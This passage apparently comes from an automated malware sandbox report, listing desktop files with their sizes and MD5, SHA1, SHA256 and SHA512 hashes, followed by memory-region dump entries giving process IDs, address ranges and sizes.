                                                    • C:\Users\Admin\Desktop\SearchCompress.avi

                                                      Filesize

                                                      115KB

                                                      MD5

                                                      6d65c1ca8fa10ce258be99d1facbe40d

                                                      SHA1

                                                      89f67de286074158cfd06bb1172c2122a2f1eaf2

                                                      SHA256

                                                      08ac2f156908e5f5cf04a80e3c98358a73abfd727e663f9bd3ff82e9938dd00b

                                                      SHA512

                                                      9c0bb502678014d8afda72db624227050e11e10f42bc9615b300cf16cffe3ea38a55cf4c63fb28f4bbccead686de3cc19bd3d135d6dcbbe6f654d8bae0fb082c

                                                    • C:\Users\Admin\Desktop\SetImport.css

                                                      Filesize

                                                      172KB

                                                      MD5

                                                      9fa72ddf04979f464b9e063ea0381057

                                                      SHA1

                                                      60133bb3afda8f6b3953fb176ea12b3364680d6c

                                                      SHA256

                                                      8bfd7d328f99163cbf4769c36b402d0f09aaf74ddadbe8f1c8de89c30f36e6b4

                                                      SHA512

                                                      ec2495d792626bd0696fb2029034f9d40083defcfcdfdf7e2c07dacda2a10cda5e735d6c45dd05f354813ab0def498b56742919686f9c812db7b91bf8288f3c3

                                                    • C:\Users\Admin\Desktop\StepInstall.vsx

                                                      Filesize

                                                      372KB

                                                      MD5

                                                      be8b2ee5b334426f6117d19b2be0e272

                                                      SHA1

                                                      7bcf4b07f4c9d073bcd2045c5de576576ee30c95

                                                      SHA256

                                                      d258ca4286cdfdb2e985d389abd18f7f3a96c39f1764f9f733eca22eeceac99d

                                                      SHA512

                                                      57e33420a0df7ac6b05349e573fa5456580d19ff5cdec248aeea697162ac033ca48cdb502049b2eaa2d250a12c0c2a692544dc335d440ba33950077035402d5f

                                                    • C:\Users\Admin\Desktop\SubmitApprove.ods

                                                      Filesize

                                                      249KB

                                                      MD5

                                                      7ed5fab10342399215620863889b35cd

                                                      SHA1

                                                      d1c8dd0831c6fab10ce37dc6eb0572b29431236e

                                                      SHA256

                                                      bb93f4b0c93b6092aec3083ad64a4dc0a1e8c304ea9ae9dd0ff344e603da3135

                                                      SHA512

                                                      1ee712dad9ee8d2c24699163daf7240a1f2ccfcc5cfaf84aa8cfdf8eec0ac54792516f536aca74d0e7cee90a78c9461d41f4a4b60f07999f5b88c753da770079

                                                    • C:\Users\Admin\Desktop\SwitchDisconnect.vssx

                                                      Filesize

                                                      158KB

                                                      MD5

                                                      20ad66c214dd245181f013955de489d4

                                                      SHA1

                                                      19465dcd1b20be78a23aeb01a7f6bbd8b648e43a

                                                      SHA256

                                                      cb13c7eb056c6a37200a3e3a736f2ddd879c8515fa3038a4611d6f68ca4e7c7e

                                                      SHA512

                                                      6e8b8a701fa9009feee41856f9949a237a6e04604476de49c0ecf9a437753c412b6849b9e8141434ff1ca3f82ba7f3d3ebcc816dabff1250e112c884a80c1ae2

                                                    • C:\Users\Admin\Desktop\WaitDeny.mp3

                                                      Filesize

                                                      228KB

                                                      MD5

                                                      709576655dd89e5f357761a61fc61881

                                                      SHA1

                                                      aa96d7891b52dc381bdeb42be9101b56862d841b

                                                      SHA256

                                                      5b7d10f1e8ec40e5efca22ae01618eed13ffd4cbdb2c203c0e5f6ba8f83de495

                                                      SHA512

                                                      d5b45377c718acaa8f4d6b413aeb880b581134be645aee3ddd07bbac8224646e521c71ad9cb189a6e77138ff006d0f75838edd2aa7f4006d5edf8541e60332f5

                                                    • C:\Users\Admin\Desktop\WaitSwitch.docx

                                                      Filesize

                                                      270KB

                                                      MD5

                                                      f7ebeb74e968ee9e25543ce9edb0ad71

                                                      SHA1

                                                      61a9579c7a64beebbf2fd1c172f7b78c26aa9c2a

                                                      SHA256

                                                      6e9794dac391f93fb1e94f27ab3b6c024779ade0411435efaf5c6f4297ada941

                                                      SHA512

                                                      d649a94445b92f9c7fc9a1efdae76fe46ca3cd4fc65ebc61548e0a3b23c0fff555ad4367c4157a9d0c1b4fdf5caa6e74ed31c9167fa2863d66323394fce5f083

                                                    • memory/432-68-0x0000000003200000-0x0000000003250000-memory.dmp

                                                      Filesize

                                                      320KB

                                                    • memory/432-69-0x000000001D350000-0x000000001D402000-memory.dmp

                                                      Filesize

                                                      712KB

                                                    • memory/732-60-0x00000000005F0000-0x0000000000914000-memory.dmp

                                                      Filesize

                                                      3.1MB

                                                    • memory/1888-681-0x000000001D860000-0x000000001DD88000-memory.dmp

                                                      Filesize

                                                      5.2MB

                                                    • memory/2020-221-0x0000000002DC0000-0x00000000031C0000-memory.dmp

                                                      Filesize

                                                      4.0MB

                                                    • memory/2020-211-0x00000000762E0000-0x0000000076532000-memory.dmp

                                                      Filesize

                                                      2.3MB

                                                    • memory/2020-204-0x00000000010D0000-0x00000000010D9000-memory.dmp

                                                      Filesize

                                                      36KB

                                                    • memory/2020-208-0x0000000002DC0000-0x00000000031C0000-memory.dmp

                                                      Filesize

                                                      4.0MB

                                                    • memory/2020-209-0x00007FFDD0DA0000-0x00007FFDD0FA9000-memory.dmp

                                                      Filesize

                                                      2.0MB

                                                    • memory/2020-224-0x0000000003820000-0x000000000384B000-memory.dmp

                                                      Filesize

                                                      172KB

                                                    • memory/2020-220-0x0000000002DC0000-0x00000000031C0000-memory.dmp

                                                      Filesize

                                                      4.0MB

                                                    • memory/2020-216-0x0000000003820000-0x000000000384B000-memory.dmp

                                                      Filesize

                                                      172KB

                                                    • memory/2092-98-0x0000000000F10000-0x0000000000FA2000-memory.dmp

                                                      Filesize

                                                      584KB

                                                    • memory/2092-100-0x00000000017C0000-0x00000000017CE000-memory.dmp

                                                      Filesize

                                                      56KB

                                                    • memory/2092-101-0x00000000017D0000-0x00000000017DC000-memory.dmp

                                                      Filesize

                                                      48KB

                                                    • memory/2416-415-0x0000000000370000-0x00000000006A2000-memory.dmp

                                                      Filesize

                                                      3.2MB

                                                    • memory/2624-386-0x0000000005FD0000-0x0000000006576000-memory.dmp

                                                      Filesize

                                                      5.6MB

                                                    • memory/2624-384-0x0000000000A20000-0x0000000000E66000-memory.dmp

                                                      Filesize

                                                      4.3MB

                                                    • memory/2624-385-0x00000000056F0000-0x00000000059F4000-memory.dmp

                                                      Filesize

                                                      3.0MB

                                                    • memory/2624-437-0x0000000005E90000-0x0000000005F22000-memory.dmp

                                                      Filesize

                                                      584KB

                                                    • memory/2624-438-0x0000000005E60000-0x0000000005E6A000-memory.dmp

                                                      Filesize

                                                      40KB

                                                    • memory/2676-227-0x000001C83CAA0000-0x000001C83CAA7000-memory.dmp

                                                      Filesize

                                                      28KB

                                                    • memory/2676-244-0x00007FF43F530000-0x00007FF43F67E000-memory.dmp

                                                      Filesize

                                                      1.3MB

                                                    • memory/2676-242-0x00007FF43F530000-0x00007FF43F67E000-memory.dmp

                                                      Filesize

                                                      1.3MB

                                                    • memory/2676-241-0x00007FF43F530000-0x00007FF43F67E000-memory.dmp

                                                      Filesize

                                                      1.3MB

                                                    • memory/2676-240-0x00007FF43F530000-0x00007FF43F67E000-memory.dmp

                                                      Filesize

                                                      1.3MB

                                                    • memory/2676-239-0x00007FF43F530000-0x00007FF43F67E000-memory.dmp

                                                      Filesize

                                                      1.3MB

                                                    • memory/2676-238-0x000001C83C9A0000-0x000001C83C9A3000-memory.dmp

                                                      Filesize

                                                      12KB

                                                    • memory/2676-225-0x000001C83C9A0000-0x000001C83C9A3000-memory.dmp

                                                      Filesize

                                                      12KB

                                                    • memory/2784-510-0x0000000008830000-0x000000000883E000-memory.dmp

                                                      Filesize

                                                      56KB

                                                    • memory/2784-500-0x0000000000490000-0x0000000000C80000-memory.dmp

                                                      Filesize

                                                      7.9MB

                                                    • memory/2784-502-0x00000000087B0000-0x00000000087B8000-memory.dmp

                                                      Filesize

                                                      32KB

                                                    • memory/2784-509-0x0000000008860000-0x0000000008898000-memory.dmp

                                                      Filesize

                                                      224KB

                                                    • memory/3116-181-0x0000000000400000-0x000000000047F000-memory.dmp

                                                      Filesize

                                                      508KB

                                                    • memory/3116-195-0x0000000000400000-0x000000000047F000-memory.dmp

                                                      Filesize

                                                      508KB

                                                    • memory/3116-130-0x0000000000400000-0x000000000047F000-memory.dmp

                                                      Filesize

                                                      508KB

                                                    • memory/3116-129-0x0000000000400000-0x000000000047F000-memory.dmp

                                                      Filesize

                                                      508KB

                                                    • memory/3116-128-0x0000000000400000-0x000000000047F000-memory.dmp

                                                      Filesize

                                                      508KB

                                                    • memory/3116-222-0x0000000000400000-0x000000000047F000-memory.dmp

                                                      Filesize

                                                      508KB

                                                    • memory/3116-131-0x0000000000400000-0x000000000047F000-memory.dmp

                                                      Filesize

                                                      508KB

                                                    • memory/3116-180-0x0000000000400000-0x000000000047F000-memory.dmp

                                                      Filesize

                                                      508KB

                                                    • memory/3116-132-0x0000000000400000-0x000000000047F000-memory.dmp

                                                      Filesize

                                                      508KB

                                                    • memory/3116-226-0x0000000000400000-0x000000000047F000-memory.dmp

                                                      Filesize

                                                      508KB

                                                    • memory/3116-198-0x0000000000400000-0x000000000047F000-memory.dmp

                                                      Filesize

                                                      508KB

                                                    • memory/3116-237-0x0000000000400000-0x000000000047F000-memory.dmp

                                                      Filesize

                                                      508KB

                                                    • memory/3116-114-0x0000000000C80000-0x0000000000E58000-memory.dmp

                                                      Filesize

                                                      1.8MB

                                                    • memory/3116-213-0x0000000000400000-0x000000000047F000-memory.dmp

                                                      Filesize

                                                      508KB

                                                    • memory/3116-135-0x0000000000400000-0x000000000047F000-memory.dmp

                                                      Filesize

                                                      508KB

                                                    • memory/3116-125-0x0000000000400000-0x000000000047F000-memory.dmp

                                                      Filesize

                                                      508KB

                                                    • memory/3116-134-0x0000000000400000-0x000000000047F000-memory.dmp

                                                      Filesize

                                                      508KB

                                                    • memory/3116-212-0x0000000000400000-0x000000000047F000-memory.dmp

                                                      Filesize

                                                      508KB

                                                    • memory/3116-148-0x0000000000400000-0x000000000047F000-memory.dmp

                                                      Filesize

                                                      508KB

                                                    • memory/3116-147-0x0000000000400000-0x000000000047F000-memory.dmp

                                                      Filesize

                                                      508KB

                                                    • memory/3116-146-0x0000000000400000-0x000000000047F000-memory.dmp

                                                      Filesize

                                                      508KB

                                                    • memory/3116-144-0x0000000000400000-0x000000000047F000-memory.dmp

                                                      Filesize

                                                      508KB

                                                    • memory/3116-143-0x0000000000C80000-0x0000000000E58000-memory.dmp

                                                      Filesize

                                                      1.8MB

                                                    • memory/3448-48-0x0000000000880000-0x0000000000888000-memory.dmp

                                                      Filesize

                                                      32KB

                                                    • memory/3592-115-0x0000000000130000-0x0000000000308000-memory.dmp

                                                      Filesize

                                                      1.8MB

                                                    • memory/3592-80-0x0000000000130000-0x0000000000308000-memory.dmp

                                                      Filesize

                                                      1.8MB

                                                    • memory/3980-634-0x0000000000750000-0x00000000009A0000-memory.dmp

                                                      Filesize

                                                      2.3MB

                                                    • memory/3980-633-0x0000000000750000-0x00000000009A0000-memory.dmp

                                                      Filesize

                                                      2.3MB

                                                    • memory/4004-471-0x0000000006260000-0x000000000627E000-memory.dmp

                                                      Filesize

                                                      120KB

                                                    • memory/4004-473-0x00000000065B0000-0x00000000065BA000-memory.dmp

                                                      Filesize

                                                      40KB

                                                    • memory/4004-472-0x0000000006610000-0x0000000006650000-memory.dmp

                                                      Filesize

                                                      256KB

                                                    • memory/4004-426-0x0000000000320000-0x0000000000332000-memory.dmp

                                                      Filesize

                                                      72KB

                                                    • memory/4004-470-0x0000000006510000-0x00000000065AC000-memory.dmp

                                                      Filesize

                                                      624KB

                                                    • memory/4004-469-0x0000000006290000-0x0000000006306000-memory.dmp

                                                      Filesize

                                                      472KB

                                                    • memory/4304-161-0x0000023E208F0000-0x0000023E208F1000-memory.dmp

                                                      Filesize

                                                      4KB

                                                    • memory/4304-151-0x0000023E208F0000-0x0000023E208F1000-memory.dmp

                                                      Filesize

                                                      4KB

                                                    • memory/4304-162-0x0000023E208F0000-0x0000023E208F1000-memory.dmp

                                                      Filesize

                                                      4KB

                                                    • memory/4304-152-0x0000023E208F0000-0x0000023E208F1000-memory.dmp

                                                      Filesize

                                                      4KB

                                                    • memory/4304-150-0x0000023E208F0000-0x0000023E208F1000-memory.dmp

                                                      Filesize

                                                      4KB

                                                    • memory/4304-160-0x0000023E208F0000-0x0000023E208F1000-memory.dmp

                                                      Filesize

                                                      4KB

                                                    • memory/4304-159-0x0000023E208F0000-0x0000023E208F1000-memory.dmp

                                                      Filesize

                                                      4KB

                                                    • memory/4304-158-0x0000023E208F0000-0x0000023E208F1000-memory.dmp

                                                      Filesize

                                                      4KB

                                                    • memory/4304-156-0x0000023E208F0000-0x0000023E208F1000-memory.dmp

                                                      Filesize

                                                      4KB

                                                    • memory/4304-157-0x0000023E208F0000-0x0000023E208F1000-memory.dmp

                                                      Filesize

                                                      4KB

                                                    • memory/4324-646-0x000000001BA80000-0x000000001BC08000-memory.dmp

                                                      Filesize

                                                      1.5MB

                                                    • memory/4464-346-0x00000000077F0000-0x00000000077FA000-memory.dmp

                                                      Filesize

                                                      40KB

                                                    • memory/4464-344-0x0000000007DE0000-0x000000000845A000-memory.dmp

                                                      Filesize

                                                      6.5MB

                                                    • memory/4464-306-0x0000000005570000-0x00000000055D6000-memory.dmp

                                                      Filesize

                                                      408KB

                                                    • memory/4464-363-0x0000000007AC0000-0x0000000007ADA000-memory.dmp

                                                      Filesize

                                                      104KB

                                                    • memory/4464-361-0x00000000079C0000-0x00000000079D5000-memory.dmp

                                                      Filesize

                                                      84KB

                                                    • memory/4464-305-0x0000000005500000-0x0000000005566000-memory.dmp

                                                      Filesize

                                                      408KB

                                                    • memory/4464-359-0x00000000079B0000-0x00000000079BE000-memory.dmp

                                                      Filesize

                                                      56KB

                                                    • memory/4464-348-0x0000000007980000-0x0000000007991000-memory.dmp

                                                      Filesize

                                                      68KB

                                                    • memory/4464-347-0x00000000079F0000-0x0000000007A86000-memory.dmp

                                                      Filesize

                                                      600KB

                                                    • memory/4464-370-0x0000000007AB0000-0x0000000007AB8000-memory.dmp

                                                      Filesize

                                                      32KB

                                                    • memory/4464-345-0x0000000007780000-0x000000000779A000-memory.dmp

                                                      Filesize

                                                      104KB

                                                    • memory/4464-303-0x0000000005890000-0x0000000005EBA000-memory.dmp

                                                      Filesize

                                                      6.2MB

                                                    • memory/4464-302-0x0000000002F70000-0x0000000002FA6000-memory.dmp

                                                      Filesize

                                                      216KB

                                                    • memory/4464-343-0x00000000076B0000-0x0000000007754000-memory.dmp

                                                      Filesize

                                                      656KB

                                                    • memory/4464-342-0x0000000006A50000-0x0000000006A6E000-memory.dmp

                                                      Filesize

                                                      120KB

                                                    • memory/4464-333-0x000000006EFE0000-0x000000006F02C000-memory.dmp

                                                      Filesize

                                                      304KB

                                                    • memory/4464-332-0x0000000006A10000-0x0000000006A44000-memory.dmp

                                                      Filesize

                                                      208KB

                                                    • memory/4464-323-0x0000000006450000-0x000000000649C000-memory.dmp

                                                      Filesize

                                                      304KB

                                                    • memory/4464-322-0x0000000006430000-0x000000000644E000-memory.dmp

                                                      Filesize

                                                      120KB

                                                    • memory/4464-318-0x0000000005F00000-0x0000000006257000-memory.dmp

                                                      Filesize

                                                      3.3MB

                                                    • memory/4464-304-0x0000000005460000-0x0000000005482000-memory.dmp

                                                      Filesize

                                                      136KB

                                                    • memory/4480-416-0x0000000006810000-0x000000000685C000-memory.dmp

                                                      Filesize

                                                      304KB

                                                    • memory/4480-397-0x0000000006160000-0x00000000064B7000-memory.dmp

                                                      Filesize

                                                      3.3MB

                                                    • memory/4700-435-0x0000000000400000-0x0000000000639000-memory.dmp

                                                      Filesize

                                                      2.2MB

                                                    • memory/4700-463-0x0000000000400000-0x0000000000639000-memory.dmp

                                                      Filesize

                                                      2.2MB

                                                    • memory/4756-588-0x0000000000C80000-0x0000000000D80000-memory.dmp

                                                      Filesize

                                                      1024KB

                                                    • memory/4756-589-0x0000000005650000-0x00000000056D8000-memory.dmp

                                                      Filesize

                                                      544KB

                                                    • memory/4756-635-0x0000000005BD0000-0x0000000005C5A000-memory.dmp

                                                      Filesize

                                                      552KB

                                                    • memory/4840-205-0x0000000000200000-0x000000000027E000-memory.dmp

                                                      Filesize

                                                      504KB

                                                    • memory/4840-203-0x00000000762E0000-0x0000000076532000-memory.dmp

                                                      Filesize

                                                      2.3MB

                                                    • memory/4840-201-0x00007FFDD0DA0000-0x00007FFDD0FA9000-memory.dmp

                                                      Filesize

                                                      2.0MB

                                                    • memory/4840-200-0x0000000003670000-0x0000000003A70000-memory.dmp

                                                      Filesize

                                                      4.0MB

                                                    • memory/4840-199-0x0000000003670000-0x0000000003A70000-memory.dmp

                                                      Filesize

                                                      4.0MB

                                                    • memory/4840-197-0x0000000000200000-0x000000000027E000-memory.dmp

                                                      Filesize

                                                      504KB

                                                    • memory/4884-45-0x00000000051D0000-0x000000000526C000-memory.dmp

                                                      Filesize

                                                      624KB

                                                    • memory/4884-44-0x0000000000790000-0x0000000000798000-memory.dmp

                                                      Filesize

                                                      32KB